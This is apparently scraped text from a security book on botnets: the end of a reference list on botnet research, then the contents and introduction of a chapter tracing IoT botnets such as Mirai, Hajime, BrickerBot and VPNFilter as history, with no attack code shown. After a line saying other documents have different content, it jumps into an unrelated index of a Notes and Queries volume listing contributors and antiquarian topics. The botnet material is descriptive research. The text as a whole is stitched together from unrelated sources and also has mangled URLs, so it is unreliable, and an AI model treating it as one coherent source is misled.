Patrick Collins, Timothy J. Shimeall, Sidney Faber, Jeff Janies, Rhiannon Weaver, Markus De Shon, and Joseph Kadane. Using uncleanliness to predict future botnet addresses. In Proceedings of the 7th ACM SIGCOMM Conference on Internet Measurement, IMC ’07, pages 93–104, New York, NY, USA, 2007. ACM. [23] Z. Chen, C. Ji, and P. Barford. Spatial-temporal characteristics of internet malicious sources. In IEEE INFOCOM 2008 - The 27th Conference on Computer Communica- tions, pages 2306–2314, Apr 2008. [24] D. Dagon, G. Gu, C. P. Lee, and W. Lee. A taxonomy of botnet structures. In Twenty-Third Annual Computer Security Applications Conference (ACSAC 2007), pages 325–339, Dec 2007. Botnet Architectures ■ 27
- 45. [25] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. My botnet is bigger than yours (maybe, better than yours): Why size estimates remain challenging. In Proceedings of the First Conference on First Workshop on Hot Topics in Understanding Botnets, HotBots’07, pages 5–5, Berkeley, CA, USA, 2007. USENIX Association. [26] David Dagon, Cliff Zou, and Wenke Lee. Modeling botnet propagation using time zones. In Proceedings of the 13th Network and Distributed System Security Symposium NDSS, 2006. [27] C. C. Zou and R. Cunningham. Honeypot-aware advanced botnet construction and maintenance. In International Conference on Dependable Systems and Networks (DSN’06), pages 199–208, Jun 2006. [28] Zakir Durumeric, Eric Wustrow, and J. Alex Halderman. Zmap: Fast internet- wide scanning and its security applications. In Presented as part of the 22nd USENIX Security Symposium (USENIX Security 13), pages 605–620, Washington, DC, 2013. USENIX. [29] F. Soldo, K. El Defrawy, A. Markopoulou, B. Krishnamurthy, and J. van der Merwe. Filtering sources of unwanted traffic. In 2008 Information Theory and Applications Workshop, pages 199–208, Jan 2008. [30] Zisis Tsiatsikas, Marios Anagnostopoulos, Georgios Kambourakis, Sozon Lambrou, and Dimitris Geneiatakis. Hidden in plain sight. sdp-based covert channel for botnet communication. In International Conference on Trust and Privacy in Digital Business, pages 48–59, 2015. Springer. [31] Zisis Tsiatsikas, Georgios Kambourakis, Dimitris Geneiatakis, and Hua Wang. The devil is in the detail: Sdp-driven malformed message attacks and mitigation in sip ecosystems. IEEE Access, 7:2401–2417, 2019. [32] K. Singh, A. Srivastava, J. Giffin, and W. Lee. Evaluating emails feasibility for botnet command and control. In 2008 IEEE International Conference on Dependable Systems and Networks With FTCS and DCC (DSN), pages 376–385, Jun 2008. [33] J. Zhang, R. Perdisci, W. Lee, X. Luo, and U. Sarfraz. Building a scalable system for stealthy p2p-botnet detection. IEEE Transactions on Information Forensics and Security, 9(1):27–38, Jan 2014. [34] Babak Rahbarinia, Roberto Perdisci, Andrea Lanzi, and Kang Li. Peerrush: Mining for unwanted p2p traffic. Journal of Information Security and Applications, 19(3):194– 208, 2014. [35] Rafael A. Rodrguez-Gmez, Gabriel Maci-Fernndez, Pedro Garca-Teodoro, Moritz Steiner, and Davide Balzarotti. Resource monitoring for the detection of parasite p2p botnets. Computer Networks, 70:302–311, 2014. [36] Christian Rossow, Dennis Andriesse, Tillmann Werner, Brett Stone-Gross, Daniel Plohmann, Christian J. Dietrich, and Herbert Bos. P2PWNED: Mod- eling and Evaluating the Resilience of Peer-to-Peer Botnets. In Proceedings of the 34th IEEE Symposium on Security and Privacy (S&P), San Francisco, CA, May 2013. [37] Thorsten Holz, Moritz Steiner, Frederic Dahl, Ernst Biersack, and Felix C Freiling. Measurements and mitigation of peer-to-peer-based botnets: A case study on storm worm. LEET, 8(1):1–9, 2008. 28 ■ Botnet
- 46. [38] Nicolas Falliere. Sality: Story of a peer-to-peer viral network. Rapport technique, Symantec Corporation, 32, 2011. [39] Joan Calvet, Carlton R Davis, and Pierre-Marc Bureau. Malware authors don’t learn, and that’s good! In 2009 4th International Conference on Malicious and Unwanted Software (MALWARE), pages 88–97, 2009, IEEE. [40] Max Kerkers, Jose´ Jair Santanna, and Anna Sperotto. Characterisation of the kelihos. b botnet. In IFIP International Conference on Autonomous Infrastructure, Management and Security, pages 79–91, 2014, Springer. [41] Daniel Plohmann and Elmar Gerhards-Padilla. Case study of the miner botnet. In 2012 4th International Conference on Cyber Conflict (CYCON), pages 1–16, 2012, IEEE. [42] Hamad Binsalleeh, Thomas Ormerod, Amine Boukhtouta, Prosenjit Sinha, Amr Youssef, Mourad Debbabi, and Lingyu Wang. On the analysis of the zeus botnet crimeware toolkit. In 2010 Eighth Annual International Conference on Privacy Security and Trust (PST), pages 31–38, 2010, IEEE. [43] The zeroaccess rootkit. https://nakedsecurity.sophos.com/zeroaccess/, Access Date: January 2019. [44] Marios Anagnostopoulos, Georgios Kambourakis, and Stefanos Gritzalis. New facets of mobile botnet: Architecture and evaluation. International Journal of Information Security, 15(5):455–473, Oct 2016. [45] Jos Martins, Catarina Costa, Tiago Oliveira, Ramiro Gonalves, and Frederico Branco. How smartphone advertising influences consumers’ purchase intention. Journal of Business Research, 94:378–387, 2019. [46] Axelle Apvrille. Symbian worm yxes: Towards mobile botnets? Journal in Computer Virology, 8(4):117–131, Nov 2012. [47] Phillip Porras, Hassen Sa¨Idi, and Vinod Yegneswaran. An analysis of the ikee.b iphone botnet. In Andreas U. Schmidt, Giovanni Russello, Antonio Lioy, Neeli R. Prasad, and Shiguo Lian, editors, Security and Privacy in Mobile Information and Communication Systems, pages 141–152, Berlin, Heidelberg, 2010. Springer Berlin Heidelberg. [48] X. Wei, L. Gomez, I. Neamtiu, and M. Faloutsos. Malicious android applications in the enterprise: What do they do and how do we fix it? In 2012 IEEE 28th International Conference on Data Engineering Workshops, pages 251–254, Apr 2012. [49] N. Etaher, G. R. S. Weir, and M. Alazab. From zeus to zitmo: Trends in banking malware. In 2015 IEEE Trustcom/BigDataSE/ISPA, volume 1, pages 1386–1391, Aug 2015. [50] Y. Zhou and X. Jiang. An analysis of the anserverbot trojan. technical report, 2011. [51] Marios Anagnostopoulos, Georgios Kambourakis, Panagiotis Drakatos, Michail Karavolos, Sarantis Kotsilitis, and David KY Yau. Botnet command and control architectures revisited: Tor hidden services and fluxing. In International Conference on Web Information Systems Engineering, pages 517–527, 2017, Springer. [52] Yuanyuan Zeng, Kang G. Shin, and Xin Hu. Design of sms commanded-and- controlled and p2p-structured mobile botnets. In Proceedings of the Fifth ACM Conference on Security and Privacy in Wireless and Mobile Networks, WISEC ’12, pages 137–148, New York, NY, USA, 2012. ACM. Botnet Architectures ■ 29
- 47. [53] Shuang Zhao, Patrick P. C. Lee, John C. S. Lui, Xiaohong Guan, Xiaobo Ma, and Jing Tao. Cloud-based push-styled mobile botnets: A case study of exploiting the cloud to device messaging service. In Proceedings of the 28th Annual Computer Security Applications Conference, ACSAC ’12, pages 119–128, New York, NY, USA, 2012. ACM. [54] Jakub Kroustek, Vladislav Iliushin, Anna Shirokova, Jan Neduchal, and Martin Hron. Torii botnet - not another mirai variant. url: https://blog.avast.com/ new-torii-botnet-threat-research, Access Date: January 2019. [55] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas. Ddos in the iot: Mirai and other botnets. Computer, 50(7):80–84, 2017. [56] B. Krebs. Krebsonsecurity hit with record ddos. url: https://krebsonsecurity.com/ 2016/09/krebsonsecurity-hit-with-record-ddos/, Access Date: January 2019. [57] Manos Antonakakis, Tim April, Michael Bailey, Matthew Bernhard, Elie Bursztein, Jaime Cochran, Zakir Durumeric, J. Alex Halderman, Luca Invernizzi, Michalis Kallitsis, Deepak Kumar, Chaz Lever, Zane Ma, Joshua Mason, Damian Menscher, Chad Seaman, Nick Sullivan, Kurt Thomas, and Yi Zhou. Understanding the mirai botnet. In Proceedings of the 26th USENIX Conference on Security Symposium, SEC’17, pages 1093–1110, Berkeley, CA, USA, 2017. USENIX Association. [58] Gokhan Sagirlar, Barbara Carminati, and Elena Ferrari. Autobotcatcher: Blockchain-based p2p botnet detection for the internet of things. 2018 IEEE 4th International Conference on Collaboration and Internet Computing (CIC), pages 1–8, 2018. [59] G. Kambourakis, C. Kolias, and A. Stavrou. The mirai botnet and the iot zombie armies. In MILCOM 2017-2017 IEEE Military Communications Conference (MILCOM), pages 267–272, Oct 2017. [60] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi. Inferring, characterizing, and investigating internet-scale malicious iot device activ- ities: A network telescope perspective. In 2018 48th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), pages 562–573, Jun 2018. [61] S. M. Sajjad and M. Yousaf. Ucam: Usage, communication and access monitoring based detection system for iot botnets. In 2018 17th IEEE International Conference On Trust, Security and Privacy In Computing And Communications/12th IEEE International Conference On Big Data Science and Engineering (TrustCom/BigDa- taSE), pages 1547–1550, Aug 2018. [62] Yair Meidan, Michael Bohadana, Yael Mathov, Yisroel Mirsky, Asaf Shabtai, Dominik Breitenbacher, and Yuval Elovici. N-baiotnetwork-based detection of iot botnet attacks using deep autoencoders. IEEE Pervasive Computing, 17:12– 22, 2018. [63] O. Shwartz, Y. Mathov, M. Bohadana, Y. Oren, and Y. Elovici. Reverse engineering iot devices: Effective techniques and methods. IEEE Internet of Things Journal, 5(6): 4965–4976,2018. [64] Yazan Boshmaf, Ildar Muslukhov, Konstantin Beznosov, and Matei Ripeanu. The socialbot network: When bots socialize for fame and money. In Proceedings of the 27th Annual Computer Security Applications Conference, ACSAC ’11, pages 93–102, New York, NY, USA, 2011. ACM. 30 ■ Botnet
- 48. [65] C. Freitas, F. Benevenuto, S. Ghosh, and A. Veloso. Reverse engineering social- bot infiltration strategies in twitter. In 2015 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM), pages 25–32, Aug 2015. [66] Leyla Bilge, Thorsten Strufe, Davide Balzarotti, and Engin Kirda. All your contacts are belong to us: Automated identity theft attacks on social networks. In Proceedings of the 18th International Conference on World Wide Web, WWW ’09, pages 551– 560, New York, NY, USA, 2009. ACM. [67] Marti Motoyama, Kirill Levchenko, Chris Kanich, Damon McCoy, Geoffrey M. Voelker, and Stefan Savage. Re: Captchas-understanding captcha-solving services in an economic context. In USENIX Security Symposium, 2010. [68] Zack Coburn and Greg Marra. Realboy: Believable twitter bots. http://ca.olin.edu/ 2008/realboy/index.html, Access Date: January 2019. [69] A. Paradise, A. Shabtai, R. Puzis, A. Elyashar, Y. Elovici, M. Roshandel, and C. Peylo. Creation and management of social network honeypots for detecting targeted cyber attacks. IEEE Transactions on Computational Social Systems, 4(3):65–79, Sep 2017. [70] C. Pacheco, A. Garcia, R. Machado, and R. Salles. Building reference datasets to support socialbots detection. In 2018 Workshop on Metrology for Industry 4.0 and IoT, pages 198–202, Apr 2018. [71] Chiyu Cai, Linjing Li, and Daniel Zeng. Detecting social bots by jointly modeling deep behavior and content information. In Proceedings of the 2017 ACM on Conference on Information and Knowledge Management, CIKM ’17, pages 1995– 1998, New York, NY, USA, 2017. ACM. [72] Zhi Yang, Christo Wilson, Xiao Wang, Tingting Gao, Ben Y. Zhao, and Yafei Dai. Uncovering social network sybils in the wild. ACM Trans. Knowl. Discov. Data, 8(1):2:1–2:29, Feb 2014. [73] Xianchao Zhang, Haijun Bai, and Wenxin Liang. A social spam detection frame- work via semi-supervised learning. In Revised Selected Papers of the PAKDD 2016 Workshops on Trends and Applications in Knowledge Discovery and Data Mining - Volume 9794, pages 214–226, Berlin, Heidelberg, 2016. Springer- Verlag. Botnet Architectures ■ 31
- 50. Chapter 2 IoT Botnets The Journey So Far and the Road Ahead Pascal Geenens Radware, Inc. Contents 2.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .34 2.2 IoT Attack Surface. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .38 2.2.1 Universal Plug and Play . . . . . . . . . . . . . . . . . . . . . . . . . . . .40 2.3 Blueprint of an IoT Botnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44 2.3.1 Kaiten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .46 2.3.1.1 Setup, Scanning and Infection. . . . . . . . . . . . . . . . . .47 2.3.1.2 Client Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .48 2.3.2 Qbot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .52 2.3.2.1 Setup. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .52 2.3.2.2 Scanning and Infection. . . . . . . . . . . . . . . . . . . . . . .54 2.3.2.3 Client Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .55 2.3.2.4 Command and Control . . . . . . . . . . . . . . . . . . . . . .59 2.3.2.5 Qbot Variants. . . . . . . . . . . . . . . . . . . . . . . . . . . . .60 2.3.3 Mirai . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .62 2.3.3.1 Client Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .63 2.3.3.2 Scanning and Infection . . . . . . . . . . . . . . . . . . . . . .65 2.3.3.3 Loader service. . . . . . . . . . . . . . . . . . . . . . . . . . . . .70 2.3.3.4 Command and Control . . . . . . . . . . . . . . . . . . . . . .75 2.3.3.5 Attack payload . . . . . . . . . . . . . . . . . . . . . . . . . . . .77 2.3.3.6 DNS Water Torture . . . . . . . . . . . . . . . . . . . . . . . .78 33
- 51. 2.3.4 Hajime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .79 2.3.4.1 Infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .82 2.3.4.2 Client Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .84 2.3.4.3 Scanner Extension Module . . . . . . . . . . . . . . . . . . . .86 2.3.5 BrickerBot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88 2.3.5.1 BrickerBot Sentinels. . . . . . . . . . . . . . . . . . . . . . . . .90 2.3.6 VPNFilter. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .92 2.3.6.1 Extension Plug-Ins. . . . . . . . . . . . . . . . . . . . . . . . . .93 2.4 DDoS-for-Hire, the Case of Booters and Stressers . . . . . . . . . . . . . . . . . .95 2.5 Closing Thought . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .97 2.1 Introduction The rise in popularity of IoT botnets centers around the Mirai attacks of October 2016. In a period of only a few weeks, KrebsOnSecurity.com1 , OVH2 , and Dyn3 all became victims of record-breaking distributed denial-of-service (DDoS) attacks. The attacks that temporarily crippled KrebsOnSecurity.com exceeded 600 Gbps in volume [1], one of the largest on record at the time. The impact of the Dyn attacks was felt by large swathes of users in Europe and North America and affected major internet platforms and services including Airbnb, GitHub, Amazon, CNN, Twitter, Slack, PlayStation Network, Xbox Live, and many more. Between the OVH and Dyn attacks, Mirai had its source code published on HackForums and quickly replicated to more accessible platforms such as GitHub. Tutorial blogs and YouTube videos detailing how to build and deploy Mirai followed shortly. From that point forward, the attacker community had access to a tool of mass destruction that was easy to build and deploy with an opportunity to improve and extend its capabilities. Since the Mirai attacks in 2016, IoT botnets have come a long way. The original goal of Mirai was to create an efficient tool for performing DDoS attacks. Later, IoT bots added new exploits, mainly to keep ahead of their competing cousins, while mostly reusing the same scanning, command and control (C2), and malicious payloads in terms of attack vectors. By the end of 2017, IoT malware started taking advantage of the same exploit vectors but carrying new malicious capabilities, such as cryptocurrency mining, anonymizing proxy services, data exfiltration capabilities, rootkits, and self- destructive sequences. The anonymizing proxies got leveraged for concealing targeted attacks and spam or click-fraud campaigns. The sophistication of IoT 1 Website of investigative reporter Brian Krebs. 2 French web hosting provider. 3 Domain Name System (DNS) provider. 34 ■ Botnets
- 52. malware increased considerably as organized hacking groups joined the opportu- nistic attacker community in their war on free distributed computing resources. The VPNFilter malware, discovered by Cisco Talos in 2018 [2], was attributed to a Russian state-sponsored cyber-crime group [3]. VPNFilter represents an inflec- tion point in terms of sophistication, persistence, and evasive actions observed in IoT malware. Up to that point, IoT malware was unsophisticated, providing limited forms of evasion, little or no concealment of C2 activity, and no or limited protection of C2 infrastructure. While the most notorious, Mirai was not the first malware to take advantage of IoT devices. As early as December 2013, a researcher [4] observed hundreds of thousands of spam emails originating from a botnet made up of one hundred thousand hacked appliances. While the majority of malicious mail was initiated by home networking devices, such as routers and network attached storage systems (NAS), a significant percentage of malicious email came from nontraditional sources such as connected multimedia centers, smart televisions, and at least one refrigerator. The words “thingbot” and “thingbot-net” were coined by Proofpoint to refer to these newly discovered IoT-based botnets. In March 2014, DDoS attacks were observed [5] originating from a botnet consisting of over 900 CCTV cameras. All compromised devices used in the attack were running embedded Linux with BusyBox. The malware was an ELF binary compiled for the ARM architecture and a variant of the BASH- LITE (aka Gafgyt) malware, known for scanning network devices running BusyBox and looking for open Telnet/SSH services, which are susceptible to brute force dictionary attacks. In this specific case, the variant also came with an ability to launch HTTP Get flood denial-of-service (DoS) attacks from the compromised devices. BASHLITE was not the first Linux malware to spread through Telnet services using username/password combinations however. The technique was already used back in 2012 by Lightaidra, a worm supporting a number of different architectures such as MIPS, ARM, and PPC and known to perform DDoS attacks. Between 2015 and 2016, different Linux malwares were discovered, all primarily used for performing DDoS attacks: Elknot/ BillGates (2015), XOR.DDoS (2015), LUABOT (2016), Remaiten (2016), NewAidra/IRCTelnet (2016), and Mirai (2016). All were improved variants or re-combined code of previous malwares in terms of scanning and exploiting, C2 protocols, and supported architectures. In September 2015, the FBI and the Department of Homeland Security published an alert on the opportunities provided by IoT for cybercrimes [6]. Despite the warning, in June 2016, a botnet consisting of 25,000 CCTV cameras assaulted an online jewelry story [7], and just a few months later the infamous Mirai demonstrated the deplorable state of IoT security by enslaving multiple hundreds of thousands devices and performing extinction-level DDoS attacks on the DNS provi- der Dyn. IoT Botnets ■ 35
- 53. From that moment forward, increasingly creative and sophisticated IoT botnets were observed. Below is a non-exhaustive list illustrating the IoT botnets that represent a milestone in the growth in sophistication of IoT botnets: ■ The Hide N’ Seek (HNS) botnet was one of the first to take a stab at persistence across boots, a nontrivial feature to implement given the diversity of devices. HNS also implemented a custom peer-to-peer protocol for its C2 communications. ■ Satori, the botnet that kept coming back in different forms and kept creating waves of IoT infections while changing infection vectors. Abusing the most obvious IoT exploits while adding new ones such as the Android Debug Bridge exploit. Satori carried mostly crypto mining payloads and no DDoS attacks and was an experiment by its author for testing and tuning exploit vectors. The author, a confused teenager, was mainly motivated by efame among his peers and known to have money issues, the mining earnings were a welcome bonus of his experiments. ■ OMG [8], a botnet that added a tiny footprint, open-source proxy server in the bots to create an anonymizer network based on other peoples’ appliances. ■ VPNFilter [2], a botnet primarily targeting routers and modems geolo- cated in Ukraine, was found carrying malicious payloads to proxy its victims’ internet traffic and scan for Modbus traffic on the local network. Allegedly a nation-state botnet with a complex multistage infection scheme, numerous evasions and provisions to protect against takedown of its C2 infrastructure. A few days before the Dyn attacks by Mirai, researchers from Rapidity Networks discovered a much more sophisticated and competing IoT botnet. They named it “Hajime” [9], “beginning” in Japanese, a playful iteration on the Mirai name that means “future” in Japanese. Hajime uses a distributed peer-to-peer protocol implemented on top of BitTorrent using daily rotating info hashes and RC4 public/private key encryption. Hajime can update itself and extend its capabilities through extension modules. Hajime is supposedly a white hat project—a botnet build to protect vulnerable IoT devices from further abuse by malicious botnets. It marked a new era in which white hat botnets could bring a solution by inoculating the internet against the viral spreading of malicious botnets through vulnerable IoT devices. In the same spirit, there was BrickerBot [10], a vigilante botnet designed to purge the internet from vulnerable IoT devices. Using sentinels that watch for infected devices that attempt to compromise one of his bots, BrickerBot would retaliate to the attacker with devastating permanent denial-of-service (PDoS) attacks. BrickerBot was the first fully autonomous IoT botnet, not requiring any user interaction to perform attacks and fully 36 ■ Botnets
- 54. decentralized in the sense that each bot was functioning entirely independently of the others. A permanent denial-of-service or PDoS attack damages its victim to such extent that replacement of hardware or reinitialization of software or firmware is needed to recover the service. The effects of a PDoS attacks are lasting, compared to a DDoS attack, which renders a service unavailable temporarily for the duration of the attack. (see Figure 2.1) October 2016 brought the inflection point for IoT botnets as Mirai provided this unsophisticated weapon of destruction, free for anyone to use, abuse, and improve. The botnet sizes observed in the first few months after Mirai were daunting, but as competition for vulnerable IoT resources grew, botnets got more fragmented, reducing the botnet sizes but at the same time increasing the number of botnets and potential threats. Owned devices got re- owned by newer, more sophisticated variants, which reduced the overall life expectancy of IoT botnets. However, never did it reduce the risk associated with IoT botnets as such, while a couple of thousand IoT devices are not enough to generate internet-level extinction events from which we got a taste during the Dyn attacks, it is plenty enough to bring down most of the online businesses. The remainder of this chapter aims to give the reader a solid understanding into the mechanics behind IoT botnets. The what and why of their features, their evolution, and, most importantly, their potential to thrive on the lackluster security of connected devices. The approach of this chapter is to illustrate through known, real-world botnets. Where available, fragments of the actual bot source code will be used to provide a deeper understanding and give a peek behind the curtains into the world of botnet authors. The chapter builds up from the earlier, Figure 2.1 PDoS vs DDoS. IoT Botnets ■ 37
- 55. Other documents randomly have different content
- 56. St. Paul's Epistle to Seneca, 88. 205. Straw paper, 491. Strickland (Agnes), her Lives of the Queens of England noticed, 104. 184. 251. Strong (Augustus) on derivation of Silo, 639. Strut-stowers, 148. 233. Subscriber on the albumenised process, 549. —— mayors and sheriffs, 126. —— "Peccavi! I have Scinde," 574. —— Shakspeare's skull, 217. Suffolk, Norman church in, 622. Surgeon (A Foreign) on Göthe's author remuneration, 29. Surrey Archæological Society, its formation, 552. Suum Cuique on "Elijah's Mantle," 453. S. (W.) on collections for poor slaves, 292. —— Hampden's death, 646. —— quotation from Melancthon, 281. Swan-marks, 62. 256. Swift (Dean), his rhymes, 250. Swinney—"That Swinney," in Junius, 213. 238. 374. S. (W. R. D.) on boom, 375. * Symbol of sow, &c., 493. Synge family, 327. 423. System of Law proposed by the Long Parliament, 389. T. T. on oasis, its accentuation, 410. —— "Plus occidit gula," &c., 292. Table-turning, 57. 131. 161. 329. 398. Taffy on Soke mill, 375. Tale, as used by Milton, explained, 249. Talleyrand's maxim, 136. * Tangier queries, 33. Tavern signs, poetical, 242. 353. 452. 568. 626.
- 57. Taylor (A.) on Greek inscription on a font, 198 Taylor (Dr. John) of Norwich, 299. Taylor (E. S.) on ennui, 377. —— Samuel Williams, 312. —— seals of Great Yarmouth, 269. Taylor (Jeremy) and Lord Hatton, 207. * —— Holy Living, edition 1848, 469. Taylor (Weld) on Dance of Death, 76. —— detail on negative paper, 203. —— Lord Halifax and Catherine Barton, 590. —— lyric by Felicia Hemans, 407. —— Muller's process, 275. —— Richard's Guide through France, 534. —— Rubens' MS. on painting, 539. —— school libraries, 220. 498. 640. T. (C. M.) on snail-gardens, 33. * Tea-marks, classification of, 197. Teate (Dr. Faithfull) noticed, 62. Teecee on Noel family, 316. Teeth, common notions respecting, 382. * Telegraph, electric, 78. Templars' green jugs, 171. 256. 574. Temple (Harry Leroy) on green eyes, 407. —— parallel passages, 465. —— small words and low words, 416. Temple lands in Scotland, 317. 480. 521. Temple, lists of students, 540. 650. Tenet or tenent. (See Tenent.) Tenent or tenet, their meaning, 258. 330. 453. 602. Tennent (Sir J. Emerson) on barnacles, 223. —— hurrah! 323. —— tenet for tenent, 330. —— "Tub to the whale," 328. —— "When the maggot bites," 304. Tennyson's Memoriam, passage in, 244. 399. * Terræ Filius, origin of, 292.
- 58. T. (E. S. T.) on "Antiquitas sæculi Juventus mundi," 651. —— "Salus populi," &c., 606. Tewars on Amcotts' pedigree, 387. —— two brothers of the same Christian name, 338. —— hurrah! 422. —— knights of the Bath, 444. —— longevity, 351. —— Lovett of Astwell, 363. 602. —— Oxford commemoration squib, 584. —— poll-tax in 1641, 310. —— return of gentry temp. Henry VI., 630. —— sheriffs of Glamorganshire, 353. —— Sir William Chester, 365. —— Thomas Chester, bishop of Elphin, 340. T. (F.) on Kenne of Kenne, 80. T. (G.) on derivation of unkid, 221. T. (G. M.) on "Service is no inheritance," 587. Θ on "Now the fierce bear," &c., 440. —— parochial libraries, 527. Theta on Lord Bacon and Shakspeare, 438. Thiernah Ogieh, Ossian's visit to, 360. Thomas (J. W.) on "an" before u long, 421. —— anticipatory use of the cross, 545. —— cash and mob, 524. —— crescent, 319. —— "Could we with ink," &c., 422. —— gloves at fairs, 421. —— "Man proposes, but God disposes," 552. —— "Mary, weep no more for me," 500. —— misapplication of terms, 537. —— misquotation, 513. —— propitiating the fairies, 617. —— "To know ourselves diseased," 421. Thomas' (St.) day, custom on, 617. Thompson (Pishey) on glossarial queries, 294.
- 59. —— Romanists confined in Ely, 79. —— Southwark pudding wonder, 79. Thornton Abbey, account of, 469. Thrupp (John) on Irish landing at Cambridge, 270. Thrush, Devonshire charm for the, 146. 265. Thucydides on the Greek factions, 44. 137. 398. Tieck (Ludwig) quoted, 124. —— Comœdia Divina, 126. 570. Tighe (Mrs.), author of Psyche, 103. 230. "Till," and "until," their etymology, 409. 527. Timbs (John) on snail-eating, 128. Times newspaper, its influential power, 334. Tin, its early use, 291. 344. 445. 575. 593. Tipper (Thomas), his epitaph, 147. T. (J.) on passage in Whiston, 244. T. (J. A.) on table-moving, 161. T. (J. G.) on passage in burial service, 78. —— quarter, as sparing life, 246. —— Rock of Ages, 81. —— table-turning, 57. —— Trosachs, derivation of, 245. T. (J. H.) on derivation of forrell, 527. T. (J. W.) on "Ancient hallowed Dee", 588. —— B. L. M., its meaning, 585. —— "Getting into a scrape," 601. —— Prince Memnon's sister, 622. —— "Suaviter in modo, fortiter in re," 586. Tobacco, smoking and drinking of, 147. Tom, mythic and material, 239. * Tom Thumb's house at Gonerby, 35. Topsy-turvy, its derivation, 385. 526. 575. Tortoises and women, 534. * Tottenham, its derivation, 318. Tower on slow-worm superstition, 33. Tower, the state prison in the, 509. T. (Q.) on definition of a proverb, 523.
- 60. Tradescant (John), his marriage certificate, 513. Trash explained, 135. Traves (Father) noticed, 565. Traylli (Sir Walter), his monument, 19. T. (R. E.) on quotation from Pascal, 44. * Trent Council, notices of, 316. Trevelyan (W. C.) on Basilica, 367. —— decomposed cloth at York, 438. —— Hobbes's portrait, 221. —— Roman remains, 466. —— snail localities, 229. —— Wardhouse, where was it? 400. Trevor (Geo. A.) on passage in burial service, 177. Trojan Horse, noticed, 487. Trosachs, derivation of, 245. True Blue noticed, 588. Trussell (Margery), her arms, 412. T. (R. V.) on oaths, 605. T. (S.) on fires at Honiton, 367. T. (T. C.) on murder of Monaldeschi, 34. T. (T. H.) on derivation of chemistry, 470. "Tub to a whale," origin of the phrase, 220. 304. 328. * Tucker (St. George), lines attributed to him, 467. Turkish grammars, 561. * Turnbull's continuation of Robertson, 515. * Tusser's doxology, 440. T. (V.) on Earl of Leicester's portrait, 290. T. (W.) on clouds in photographs, 501. —— tea-marks, 197. * Tyddeman (Adm. Sir Thomas), 317. Types, movable metal, 454. Tyro on Cocker's Arithmetic, 540. U.
- 61. Univocalic verses, 416. Unkid, its derivation, 221. 353. 604. Unneath, its meaning, 160. V. * Van Bassen noticed, 538. Vanbrugh (Sir John) noticed, 65. 160. 232. 352. 480. Vandyke in America, 182. 228. Variety is pleasing, 490. Vault at Richmond, Yorkshire, 388. 573. V. (C.) on Lady Percy, wife of Hotspur, 184. —— Philip III. of Spain, his death, 583. * Vellum cleaning, 340. Verney note decyphered, 17. Vernon (Lady), maid of honour, 462. Veronica on Queen Elizabeth's true looking-glass, 220. Victor on Thornton Abbey, 469. * Vida on Chess, 469. Vigors (Rev. Urban) noticed, 340. 477. Villers en Couché, battle of, 8. 127. 205. 370. Virgil, passage quoted by Dr. Johnson, 270. 400. 523. 576. Vix on Mrs. Tighe, 230. Voiding knife, 232. 297. Volcanoes and mountains of gold in Scotland, 285. Voltaire on railway travelling, 34. 65. "Vox populi vox Dei," 494. W. on blue bell—blue anchor, 388. —— clipper, as applied to vessels, 399. —— Ireland a bastinadoed elephant, 366. —— nugget not an Americanism, 375. —— table-turning, 398.
- 62. W. on Leeming family, 587. —— Norman of Winster, 126. —— Natural History of Balmoral, 467. W. (A.) on passage in Wordsworth, 77. W. (A. F. A.) on the Brazen Head, 367. Wake (H. Thomas) on Castle Thorpe, 387. —— Inscriptions on monuments, 215. Walcott (Mackenzie) on birthplace of Edward I., 601. —— books chained in churches, 596. —— school libraries, 298. * Wall (General) noticed, 318. Wallace (Sir Wm.), state prisoner, 509. * Wallis's Sermons on the Trinity, 172. Walpole (Horace) on Grammont's marriage, 549. Walpole (Sir Robert), his medal, 57. 231. Walter (Henry) on Cranmer and Calvin, 222. —— Froissart's accuracy, 604. —— translation of Ps. cxxvii. 2., 642. Walton (Christopher), his collection of mystic authors, 247. Walton (Izaak), Duport's lines on, 193. Ward (J.) on Mackey's Theory of the Earth, 468. Warde (R. C.) on Anthony Bave's MSS., 469. —— bargain-cup, 220. —— "custom of ye Englishe," 362. —— distich on the late harvest, 513. —— fable of washing the blackamore, 150. —— inscriptions in books, 591. —— John Frewen, 222. —— Lanquet's Chronicle, 494. —— Lovell, sculptor, 342. —— Mrs. Shaw's tombstone, 222. —— "Our English Milo," 495. —— party, its earliest mention, 137. —— Plantin Bibles in 1600, 537. —— parochial libraries, 327. —— polarised light, 552.
